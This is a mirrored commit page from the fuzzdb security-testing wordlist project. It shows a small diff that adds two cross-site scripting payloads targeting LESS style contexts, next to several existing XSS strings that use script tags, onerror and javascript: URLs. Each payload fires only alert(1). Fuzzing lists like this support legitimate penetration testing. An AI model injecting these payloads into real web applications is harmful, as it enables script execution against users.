mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-10 05:24:12 +00:00
Merge pull request #159 from merttasci/patch-1
added 2 style context XSS attacks for LESS
This commit is contained in:
commit
715977900d
1 changed files with 2 additions and 0 deletions
|
@ -163,3 +163,5 @@ javascript:alert(1)
|
|||
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
|
||||
x”</title><img src%3dx onerror%3dalert(1)>
|
||||
[[#%3Cscript%3Ealert(1)%3C/script%3E|
|
||||
a{b:`function(){alert(1)}()`;}
|
||||
"><style type=text/less>a{b:`function(){alert(1)}()`;}</style>
|
||||
|
|
Loading…
Reference in a new issue